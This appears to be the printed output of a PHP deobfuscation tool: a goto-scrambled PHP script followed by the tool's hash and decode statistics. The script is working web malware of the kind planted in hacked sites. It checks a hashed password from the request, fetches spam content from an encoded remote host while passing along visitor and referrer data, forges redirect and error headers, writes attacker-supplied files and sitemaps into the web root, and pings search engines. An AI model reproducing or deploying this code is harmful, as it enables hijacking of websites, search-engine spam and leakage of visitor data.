$RHF2e = dirname(__FILE__);
goto t9IJa;
uAV8Z:
if (!file_put_contents($RHF2e . "\x2f" . $doQd_, $m2k0k)) {
  goto xz943;
}
goto IuXFH;
pswuA:
if (!($dx2nO == "\x70\x75\x74")) {
  goto UGjC2;
}
goto xhgcX;
BdK6J:
$dvNsH = substr($eoLmA, 4);
goto zaKTp;
J2Wdf:
$EE0WS = iDFZ2($fNA1_);
goto lEACH;
inele:
U3Xss($tshPi, $t506A, $liNWD);
goto xGv1w;
yxenm:
Gb1Oa:
goto Mjt9o;
DjiRB:
exit;
goto yxenm;
cjbcQ:
$E74FR = sha1(sha1(@$_REQUEST["\x70\x64"]));
goto m5id9;
upEpR:
$OLm6n = file_get_contents($t506A);
goto QgQoC;
vEKjr:
goto AYbRT;
goto BZyjC;
afUX0:
w9VWX:
goto Hj9Jf;
qBJJ0:
if (strstr($pw0B_, "\x6f\153\x68\164\155\154\x67\x65\x74\x63\x6f\156\x74\145\156\164")) {
  goto JbDNl;
}
goto I_ZJa;
C4WF4:
$ysNSk = urlencode($ysNSk);
goto KR9Kt;
LJeN2:
$Vr7dY = "\x68\164\164\x70";
goto iJNHf;
a_tJs:
ehYmL:
goto WJcpf;
DkF6W:
exit;
goto U7Hij;
W61Oa:
goto WqoWM;
goto oZaKC;
gDxXt:
zQV7m:
goto d1N4r;
Hj9Jf:
$nHle3 = "\x68\164\x74\x70\163";
goto bA2kE;
cCbdZ:
NQtyB:
goto tg83k;
CsEw7:
kvmBz:
goto a1bFu;
GRsSl:
dcjhy:
goto pyozO;
oAjP_:
$LLUXB = $Vr7dY . "\x3a\x2f\x2f" . $ADZWd . "\57\151\156\144\145\x78\156\145\167\x2e\x70\150\x70\x3f\x77\145\142\75" . $eoLmA . "\x26\172\172\75" . SheI9() . "\x26\x75\162\151\x3d" . $hhK6x . "\46\x75\x72\x6c\x73\x68\141\x6e\x67\75" . $sZB9t . "\46\x68\164\164\x70\x3d" . $nHle3 . "\46\154\x61\156\x67\x3d" . $ysNSk;
goto ORnJO;
I27ZC:
$dlJF9 = "\57";
goto Olfq4;
dCwhk:
$hzwAe = "\x63\x73\x73";
goto vEKjr;
V3w6w:
if (strstr($pw0B_, "\x67\x65\x74\143\157\x6e\x74\x65\x6e\x74\x35\x30\x30\x70\x61\147\145")) {
  goto KoNNw;
}
goto WcaMd;
jwBp3:
$pw0B_ = str_replace("\x70\x69\156\147\170\155\x6c\x67\145\164\143\x6f\156\x74\x65\156\x74", '', $pw0B_);
goto W3bSP;
A4WSb:
goto cSBRU;
goto qP93p;
jTPgk:
@header("\103\157\x6e\x74\145\x6e\164\55\164\x79\160\x65\72\40\164\x65\x78\164\x2f\x68\x74\155\154\x3b\x20\x63\x68\x61\x72\163\x65\x74\x3d\x75\164\x66\55\x38");
goto l84Og;
GAdVK:
exit;
goto u1uGD;
kJ7w9:
rADb1:
goto Np_LL;
l84Og:
echo FQROm($pw0B_);
goto DkF6W;
WJcpf:
UGjC2:
goto DjiRB;
K16cM:
JbDNl:
goto CAxAd;
NfYbJ:
UFIeg:
goto oECxM;
McnnE:
T3Qnj:
goto mQ2HE;
FNAox:
$pw0B_ = str_replace("\x6f\153\170\x6d\x6c\x67\145\x74\x63\x6f\156\164\x65\156\164", '', $pw0B_);
goto cDcfr;
lEACH:
y12Mm:
goto M5c7V;
Ylxth:
exit;
goto NmMG6;
jBvkR:
function fqroM($XiNLm)
{
  goto Y3ip1;
  Y3ip1:
  $gNBt7 = explode("\15\xa", trim($XiNLm));
  goto tSxWI;
  klsNx:
  foreach ($gNBt7 as $AkGxu) {
    goto z2srz;
    R9C2h:
    $zrsVm = strpos($cfS4h, "\123\151\164\145\155\141\x70\x20\x4e\157\x74\x69\146\x69\143\141\x74\x69\157\x6e\40\x52\145\143\x65\151\166\x65\x64") !== false ? "\160\151\x6e\x67\157\153" : "\x65\x72\162\x6f\162";
    goto YG7SA;
    YG7SA:
    $wG6VW .= $AkGxu . "\55\x2d\x20" . $zrsVm . "\74\142\162\x3e";
    goto T0ioY;
    z2srz:
    $cfS4h = IDfZ2($AkGxu);
    goto R9C2h;
    T0ioY:
    FowMk:
    goto Ym9C2;
    Ym9C2:
  }
  goto doQnD;
  EwaRe:
  return $wG6VW;
  goto C4w5a;
  doQnD:
  jfZZj:
  goto EwaRe;
  tSxWI:
  $wG6VW = '';
  goto klsNx;
  C4w5a:
}
goto yZTzg;
cDcfr:
@header("\103\157\156\x74\x65\x6e\164\x2d\x74\x79\160\x65\72\40\164\x65\170\164\x2f\x78\x6d\154");
goto zoh3C;
HR7F3:
@unlink($NU6nP);
goto Jv8Bc;
IUbJy:
goto UFIeg;
goto CsEw7;
a1bFu:
$RHF2e = $_SERVER["\104\117\x43\x55\115\105\x4e\124\137\122\x4f\x4f\124"];
goto NfYbJ;
ZL0SS:
@header("\x48\x54\124\120\x2f\x31\56\61\40\65\x30\x30\x20\111\x6e\x74\x65\162\x6e\x61\154\x20\123\x65\x72\x76\145\162\40\105\162\x72\157\162");
goto Ylxth;
pyozO:
$NU6nP = $RHF2e . "\x2f\x73\x69\164\x65\155\x61\160\x2e\170\155\x6c";
goto GqI7N;
L17p0:
HQlys:
goto pswuA;
r_rwU:
goto y12Mm;
goto yxZ1M;
ybI1y:
header("\x4c\157\143\141\x74\x69\157\x6e\72\40" . $pw0B_);
goto AJaL0;
Vkqwo:
$doQd_ = @$_REQUEST["\155\141\160\156\x61\155\145"];
goto DTjda;
Dh59K:
echo "\x3c\142\x72\76\x6f\153\x3c\142\x72\76";
goto cQdrd;
bg7af:
$sZB9t = $_SERVER["\110\x54\124\x50\137\x52\105\106\105\122\105\x52"];
goto Aiao7;
UovW2:
goto Je0_F;
goto K16cM;
xKo2B:
function ppTf0()
{
  goto IWasp;
  LX3hc:
  svlZP:
  goto pCaH2;
  HaJHx:
  FP4PC:
  goto gCxYT;
  gCxYT:
  $hhK6x = $_SERVER["\122\105\x51\x55\x45\123\x54\x5f\125\122\111"];
  goto LX3hc;
  pCaH2:
  return $hhK6x;
  goto IT5xE;
  G_7mm:
  goto svlZP;
  goto HaJHx;
  GpVAB:
  tBfHD:
  goto G_7mm;
  qhmHF:
  $hhK6x = $_SERVER["\x50\x48\120\137\123\105\114\x46"] . "\77" . $_SERVER["\x51\x55\x45\122\131\137\123\x54\x52\x49\116\107"];
  goto bp1WE;
  Kw51w:
  $hhK6x = $_SERVER["\120\x48\x50\x5f\123\105\x4c\x46"] . "\77" . $_SERVER["\x61\162\x67\166"][0];
  goto GpVAB;
  V9x9B:
  DIXhA:
  goto Kw51w;
  bp1WE:
  goto tBfHD;
  goto V9x9B;
  IWasp:
  if (isset($_SERVER["\x52\105\121\125\x45\123\124\x5f\x55\122\111"])) {
    goto FP4PC;
  }
  goto oHXe6;
  oHXe6:
  if (isset($_SERVER["\x61\162\147\x76"])) {
    goto DIXhA;
  }
  goto qhmHF;
  IT5xE:
}
goto k4I2V;
L2k5m:
if (file_exists($t506A)) {
  goto eIrwF;
}
goto IYRQe;
Np_LL:
goto zQV7m;
goto cCbdZ;
AROSu:
$RHF2e = $_SERVER["\x44\117\x43\125\115\x45\116\x54\x5f\x52\x4f\x4f\124"];
goto t5Z24;
Mjt9o:
if (isset($_SERVER["\x44\117\x43\x55\115\105\x4e\x54\137\x52\117\x4f\x54"])) {
  goto djX3m;
}
goto AoM7q;
yIdfh:
if (file_exists($fNA1_)) {
  goto XGVN3;
}
goto K_hU6;
mRiff:
$h57Dr = sha1(sha1(@$_REQUEST["\x62"]));
goto MmSA5;
x2t3P:
exit("\x3c\141\40\150\x72\x65\146\x3d" . $mLSUc . "\x3e" . $mLSUc . "\x3c\57\x61\76");
goto wsydS;
iJNHf:
if (Oz7GQ()) {
  goto w9VWX;
}
goto sv91p;
wsydS:
hudbc:
goto gLfK3;
qP93p:
wVp_k:
goto egKSG;
Aiao7:
$sZB9t = urlencode($sZB9t);
goto pzPhK;
ZzuO1:
echo "\x3c\x62\162\x3e\146\151\154\x65\40\x77\162\x69\x74\145\x20\146\141\154\163\x65\41\74\x62\162\x3e";
goto A4WSb;
R2Zle:
$dvNsH = $eoLmA;
goto W61Oa;
yxZ1M:
XGVN3:
goto J2Wdf;
F5myT:
exit;
goto xbWzu;
dsa4O:
function IdFZ2($XiNLm)
{
  goto tSmVg;
  yFLzO:
  $xE1Qm = curl_exec($fQNCI);
  goto CHPxf;
  A5hU8:
  return $xE1Qm;
  goto oZsX_;
  FIZZG:
  curl_setopt($fQNCI, CURLOPT_SSL_VERIFYPEER, 0);
  goto D99Zj;
  BTFDZ:
  curl_setopt($fQNCI, CURLOPT_URL, $XiNLm);
  goto AdsuW;
  r7pJN:
  if ($xE1Qm) {
    goto sQlni;
  }
  goto NspkF;
  CHPxf:
  curl_close($fQNCI);
  goto LVfv_;
  LVfv_:
  Xd1aM:
  goto r7pJN;
  Pbc6Y:
  sQlni:
  goto A5hU8;
  D99Zj:
  curl_setopt($fQNCI, CURLOPT_RETURNTRANSFER, 1);
  goto knkFy;
  NspkF:
  $xE1Qm = @file_get_contents($XiNLm);
  goto Pbc6Y;
  tSmVg:
  $xE1Qm = '';
  goto cETBN;
  cETBN:
  if (!function_exists("\143\x75\x72\154\137\151\156\x69\164")) {
    goto Xd1aM;
  }
  goto tXoZb;
  tXoZb:
  $fQNCI = curl_init();
  goto BTFDZ;
  AdsuW:
  curl_setopt($fQNCI, CURLOPT_SSL_VERIFYHOST, 0);
  goto FIZZG;
  knkFy:
  curl_setopt($fQNCI, CURLOPT_CONNECTTIMEOUT, 30);
  goto yFLzO;
  oZsX_:
}
goto cfzXi;
ZiP4H:
$MdQVO = "\45\66\x45\x25\x36\65\x25\x37\x30\45\67\65\45\x37\66\45\67\x30\x25\67\70\45\x36\x42\45\x37\71\45\62\x45\45\66\x36\45\66\x33\45\x37\65\x25\66\x45\45\x36\x36\45\x36\x37\45\x36\x43\45\67\61\45\x36\61\x25\62\x45\x25\66\x42\x25\66\103\x25\x36\x44";
goto LJeN2;
oZaKC:
bwvje:
goto BdK6J;
ECy8h:
if (stristr($EE0WS, $I4E_s)) {
  goto ArZXr;
}
goto Seppt;
miPDW:
$OmnPj = str_rot13(substr($dvNsH, 0, 3) . substr($ADZWd, 0, 3)) . "\x2e\x63\163\163";
goto vQGF1;
cr868:
KoNNw:
goto ZL0SS;
u_pos:
V_P2C:
goto Tk7qR;
l5eI6:
$pw0B_ = str_replace("\147\145\164\143\157\156\164\x65\156\164\x33\x30\61\x70\x61\147\x65", '', $pw0B_);
goto ybI1y;
N3eYU:
@header("\x48\x54\x54\x50\57\x31\56\x31\x20\x33\x30\x31\x20\x4d\157\166\x65\144\x20\120\145\x72\155\141\156\145\x6e\x74\x6c\x79");
goto l5eI6;
yRmy7:
if (!preg_match("\57\136\x67\x6f\x6f\x67\x6c\x65\56\x2a\x3f\50\134\x2e\x68\x74\155\154\51\x24\57\151", $mLSUc)) {
  goto hudbc;
}
goto Ghu9y;
KR9Kt:
$sZB9t = '';
goto Wf7vv;
QgQoC:
$pw0B_ = str_replace("\133\x23\x23\x6c\x69\156\153\x63\x73\163\x23\x23\x5d", $OLm6n, $pw0B_);
goto McnnE;
zlldn:
goto rADb1;
goto cDqVe;
U8mlE:
djX3m:
goto AROSu;
If3kx:
$liNWD = $Vr7dY . "\x3a\x2f\57" . $ADZWd . "\x2f\164\x65\x6d\x70\57\x73\164\x79\x6c\145\x2e\143\163\163";
goto jBvkR;
hKZK5:
if (!($dlJF9 == "\57" || strstr($dlJF9, "\x65\x77\x74\164\155"))) {
  goto bnTZ2;
}
goto inele;
W3bSP:
U3Xss($tshPi, $t506A, $liNWD);
goto jTPgk;
i0uGM:
goto MfSA0;
goto GRsSl;
n3mQo:
goto GRRKQ;
goto DnsO5;
kzBVG:
$RHF2e = dirname(__FILE__);
goto IUbJy;
NmMG6:
XqZCm:
goto pP4te;
xhgcX:
if (!isset($_REQUEST["\x67\x6f\x6f\x67\154\145"])) {
  goto mLhVq;
}
goto pfJQi;
BZyjC:
RURK3:
goto t4InS;
nPDCH:
function oz7gQ()
{
  goto zOVYF;
  KYHgj:
  return true;
  goto hehQj;
  uujBb:
  L_itu:
  goto qco7f;
  qco7f:
  return true;
  goto WD5zq;
  WD5zq:
  QcQ7Q:
  goto Kg6J4;
  zOVYF:
  if (isset($_SERVER["\110\124\124\x50\123"]) && strtolower($_SERVER["\110\124\124\120\123"]) !== "\157\x66\x66") {
    goto xiTx1;
  }
  goto cgiyR;
  cgiyR:
  if (isset($_SERVER["\x48\x54\124\120\x5f\x58\137\106\117\122\127\101\122\104\x45\104\x5f\x50\x52\117\124\117"]) && $_SERVER["\110\x54\124\x50\137\x58\137\x46\117\x52\127\x41\x52\104\105\x44\137\x50\122\117\124\x4f"] === "\x68\x74\x74\x70\x73") {
    goto zpvtn;
  }
  goto ISrcZ;
  ISrcZ:
  if (isset($_SERVER["\x48\x54\124\120\x5f\x46\x52\117\x4e\124\137\x45\116\x44\137\x48\124\124\x50\123"]) && strtolower($_SERVER["\x48\x54\x54\120\x5f\106\122\x4f\x4e\124\x5f\x45\116\x44\x5f\110\124\124\x50\123"]) !== "\x6f\x66\146") {
    goto L_itu;
  }
  goto D9SvC;
  D9SvC:
  goto QcQ7Q;
  goto SEiXn;
  hehQj:
  goto QcQ7Q;
  goto Xldzv;
  SEiXn:
  xiTx1:
  goto KYHgj;
  Xldzv:
  zpvtn:
  goto oSa1y;
  FRzXJ:
  goto QcQ7Q;
  goto uujBb;
  Kg6J4:
  return false;
  goto cup6U;
  oSa1y:
  return true;
  goto FRzXJ;
  cup6U:
}
goto GxhpJ;
sUgFj:
goto jtGwQ;
goto afUX0;
Seppt:
if (file_put_contents($fNA1_, trim($EE0WS) . "\xd\12" . "\123\151\164\145\x6d\x61\160\x3a\x20" . $I4E_s)) {
  goto wVp_k;
}
goto ZzuO1;
xbWzu:
nbJPU:
goto d5sfX;
s8O1C:
$pw0B_ = trim(iDfZ2($LLUXB));
goto k82qD;
IvNE8:
HOvfu:
goto FNAox;
U7Hij:
Ty3kS:
goto aHEso;
Pbx8o:
if (stristr($doQd_, "\125\x73\145\x72\55\x61\147\x65\x6e\164")) {
  goto NQtyB;
}
goto yIdfh;
fOu7N:
exit;
goto Eqtik;
IA0bn:
cSBRU:
goto zlldn;
BycPi:
echo "\x3c\x62\x72\x3e\x66\151\154\145\x20\x77\162\x69\x74\x65\40\146\x61\x6c\x73\x65\x21\74\142\x72\x3e";
goto n3mQo;
H4n1S:
v7LIU:
goto TZmNx;
PrQzr:
echo "\x3c\x62\x72\x3e\x73\x69\x74\x65\x6d\x61\x70\x20\x6e\x61\x6d\145\40\146\141\x6c\x73\x65\41\74\142\x72\76";
goto i0uGM;
hgOiz:
echo $pw0B_;
goto GAdVK;
tg83k:
@unlink($fNA1_);
goto xckp1;
mQ2HE:
$pw0B_ = str_replace("\157\153\x68\x74\x6d\154\147\145\164\x63\x6f\156\x74\145\x6e\x74", '', $pw0B_);
goto hgOiz;
cQdrd:
GRRKQ:
goto gDxXt;
G0gtC:
if (!($dlJF9 == '')) {
  goto Dsdvq;
}
goto I27ZC;
egKSG:
echo "\x3c\142\162\x3e\x6f\153\74\142\162\76";
goto IA0bn;
xckp1:
if (file_put_contents($fNA1_, $doQd_)) {
  goto XaPn2;
}
goto BycPi;
Vd9vR:
if (substr($eoLmA, 0, 4) == "\167\167\x77\56") {
  goto bwvje;
}
goto R2Zle;
M5c7V:
$I4E_s = $nHle3 . "\x3a\57\x2f" . $eoLmA . "\x2f" . $doQd_;
goto ECy8h;
BcLkM:
A0W_N:

Function Calls

None

Variables

None

Stats

MD5 d58d8aa2dc5fa9022ec0d25500b21109
Eval Count 0
Decode Time 43 ms